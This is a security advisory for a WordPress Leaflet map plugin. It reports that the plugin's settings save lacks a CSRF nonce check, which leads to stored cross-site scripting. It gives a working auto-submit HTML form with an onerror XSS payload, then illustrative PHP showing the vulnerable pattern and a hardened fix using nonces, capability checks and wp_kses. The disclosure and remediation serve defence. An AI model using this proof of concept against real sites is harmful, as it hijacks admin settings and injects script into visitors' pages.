The plugin does not verify the CSRF nonce when saving its settings, so an attacker can make a logged-in admin update the settings via a Cross-Site Request Forgery attack, for example by luring the admin to a page that auto-submits a form to the plugin's settings endpoint. This can lead to Cross-Site Scripting: the attacker can either change the URL of the JavaScript (Leaflet) library the plugin loads, pointing it at an attacker-controlled script, or supply a malicious attribution string, which is output unescaped and is therefore executed on every page that embeds a map from the plugin.
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=leaflet-map" method="POST">
      <input type="hidden" name="default_lat" value="44.67" />
      <input type="hidden" name="default_lng" value="-63.61" />
      <input type="hidden" name="default_zoom" value="12" />
      <input type="hidden" name="default_height" value="250" />
      <input type="hidden" name="default_width" value="100%" />
      <input type="hidden" name="default_min_zoom" value="0" />
      <input type="hidden" name="default_max_zoom" value="20" />
      <input type="hidden" name="default_tiling_service" value="other" />
      <input type="hidden" name="mapquest_appkey" value="Supply an API key if you choose MapQuest" />
      <input type="hidden" name="map_tile_url" value="https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png" />
      <input type="hidden" name="map_tile_url_subdomains" value="abc" />
      <input type="hidden" name="tilesize" value="" />
      <input type="hidden" name="mapid" value="" />
      <input type="hidden" name="accesstoken" value="" />
      <input type="hidden" name="zoomoffset" value="" />
      <input type="hidden" name="js_url" value="https://unpkg.com/[email protected]/dist/leaflet.js" />
      <input type="hidden" name="css_url" value="https://unpkg.com/[email protected]/dist/leaflet.css" />
      <!-- Malicious attribution: stored unescaped and rendered on every page with an embedded map -->
      <input type="hidden" name="default_attribution" value="<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="geocoder" value="osm" />
      <input type="hidden" name="google_appkey" value="Supply a Google API Key" />
      <input type="hidden" name="togeojson_url" value="https://unpkg.com/@mapbox/[email protected]/togeojson.js" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
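The following is an added example, not the plugin's own code, showing the settings-save pattern the advisory describes and a hardened version of it. It is written as WordPress plugin code and assumes it runs inside WordPress (the `check_admin_referer`, `wp_nonce_field`, `wp_kses` and `update_option` calls are the real WordPress APIs). The option names, the nonce action name, the `leaflet_demo_` function names and the CDN allow-list are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's code). Option names, nonce action and
// function names are assumptions; the WordPress APIs called are real.

// --- Vulnerable pattern: any POST that reaches the settings page is saved ---
function leaflet_demo_save_settings_vulnerable() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // No nonce check and no capability check: a cross-site form that the
    // admin's browser submits with its session cookies is accepted as a save.
    update_option( 'leaflet_map_js_url', $_POST['js_url'] );
    update_option( 'leaflet_map_attribution', $_POST['default_attribution'] );
}

// Vulnerable rendering: the stored attribution is echoed raw into every page
// that embeds a map, so an <img src onerror=...> payload executes there.
function leaflet_demo_render_attribution_vulnerable() {
    return '<div class="leaflet-control-attribution">'
        . get_option( 'leaflet_map_attribution', '' ) . '</div>';
}

// --- Hardened pattern ------------------------------------------------------
const LEAFLET_DEMO_NONCE_ACTION = 'leaflet_demo_save_settings';

// Inline markup allowed in an attribution: links and emphasis, no event
// handlers, no <img>, no <script>. Used on input and on output.
function leaflet_demo_allowed_attribution_tags() {
    return array(
        'a'      => array( 'href' => array(), 'title' => array(), 'rel' => array() ),
        'strong' => array(),
        'em'     => array(),
    );
}

function leaflet_demo_settings_form() {
    echo '<form method="post">';
    // Emits a hidden _wpnonce field bound to this action, the current user
    // and the site secret; a third-party site cannot forge its value.
    wp_nonce_field( LEAFLET_DEMO_NONCE_ACTION );
    echo '<input type="url" name="js_url" value="'
        . esc_attr( get_option( 'leaflet_map_js_url', '' ) ) . '">';
    echo '<input type="text" name="default_attribution" value="'
        . esc_attr( get_option( 'leaflet_map_attribution', '' ) ) . '">';
    submit_button();
    echo '</form>';
}

function leaflet_demo_save_settings_hardened() {
    if ( ! isset( $_POST['submit'] ) ) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF check: verifies _wpnonce against the action and dies if the
    //    nonce is missing, expired or issued for another user or action.
    check_admin_referer( LEAFLET_DEMO_NONCE_ACTION );

    // 3. Sanitise the library URL on input: only https is accepted, and the
    //    host must be on an allow-list of known CDNs (assumed list), so the
    //    page cannot be made to load an attacker-hosted script.
    $js_url        = esc_url_raw( wp_unslash( $_POST['js_url'] ?? '' ), array( 'https' ) );
    $allowed_hosts = array( 'unpkg.com', 'cdn.jsdelivr.net' );
    if ( ! in_array( wp_parse_url( $js_url, PHP_URL_HOST ), $allowed_hosts, true ) ) {
        $js_url = '';
    }

    // 4. Strip everything but harmless inline markup from the attribution.
    $attribution = wp_kses(
        wp_unslash( $_POST['default_attribution'] ?? '' ),
        leaflet_demo_allowed_attribution_tags()
    );

    update_option( 'leaflet_map_js_url', $js_url );
    update_option( 'leaflet_map_attribution', $attribution );
}

// Hardened rendering: filter on output too, so a value written to the option
// by some other path (import, older plugin version) cannot carry a payload.
function leaflet_demo_render_attribution_hardened() {
    return '<div class="leaflet-control-attribution">'
        . wp_kses( get_option( 'leaflet_map_attribution', '' ),
                   leaflet_demo_allowed_attribution_tags() )
        . '</div>';
}
```

With the hardened handler, the proof-of-concept form above fails at `check_admin_referer()` because it carries no `_wpnonce` field, and even a request that somehow reached the save would have its `<img src onerror=...>` attribution reduced to empty text by `wp_kses`. Both checks are needed: the nonce stops the forged request, and the input and output filtering limit the damage if a settings write happens through any other path.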
apple502j
apple502j
Yes
2021-07-01
2021-07-07
2022-02-13